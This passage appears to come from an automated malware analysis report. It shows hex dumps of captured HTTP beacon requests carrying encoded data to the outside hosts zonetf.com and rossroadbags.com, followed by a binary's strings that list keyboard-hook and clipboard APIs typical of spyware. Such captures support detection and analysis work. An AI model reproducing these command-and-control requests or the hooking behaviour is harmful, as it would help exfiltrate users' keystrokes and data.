0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a6e 72376e38 68345169   .......nr7n8h4Qi
0x00000160 (00352)   4d623335 67624b4c 4b384b6b 3446786b   Mb35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7756 4b763937 35586c6d   X%2BSNwVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a72202f 3e0a2020   ose......r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78623579 676d3143   JsX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a623335 67624b4c 4b384b6b 3446786b   .b35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....


Strings
.
 ..K.
..@......tb...7.
_..NU(..A.
....p>.
.
^..A..W%..\y..
Gj./..
{..[R7nS
......^.
.C...y
21H...
..).......6..e....
.^....
.#f.
.z..d
..
zj.H...u.
#......._
...0...a
m
....
.B.7...
...y..
).
..
040904b0
1532
DfGe
E'dP
fg'3
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
4,766v:
,5nCeN
\6{i5I
:6Xm5xc
7Y*@WnV6
85,vj:-(
(8cf0vD
`8mff4
=b=_{y5[ 
CallNextHookEx
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiber
CreateILockBytesOnHGlobal
CreateStreamOnHGlobal
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
eh;fN	
EmptyClipboard
EnumResourceNamesW
'F|0?T
F{-3imP
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FlushFileBuffers
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
H/0jG3
Hbf&|0
\h$(KV
hm<jw%
i%'D]?f
i(h~*x
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
JRichu
{J|tkF
j**UUa
KERNEL32.dll
K{hK<V
l|695,e
\-L79G
*L~||F
LocalAlloc
LockFile
MonitorFromWindow
Mv{~kW
NdrClientCall
n:(Mkg
/nX+VM/
)nZojN
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
>ouE/VO^
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
ProgIDFromCLSID
P`R^yU
rB#h\R
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
rI2#".
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
s4N_08
SearchPathW
SetClipboardData
SetEndOfFile
SetScrollRange
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
sn#a%j
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
[s#w|ON
t3(.^Wz
tH^7,(
!This program cannot be run in DOS mode.
tIJBG H	
ToAscii
 ^UauH72
UnhookWindowsHookEx
UnlockFile
USER32.dll
,uv~NkL
%%:v("
V`D0bL
VerLanguageNameW
,/VVrf
WinHelpW
W</Kn*
WriteFileGather
wy-J?Ns
y>,7Io
y[LY80
zKT~l)
^(zNT]
z[!,Z4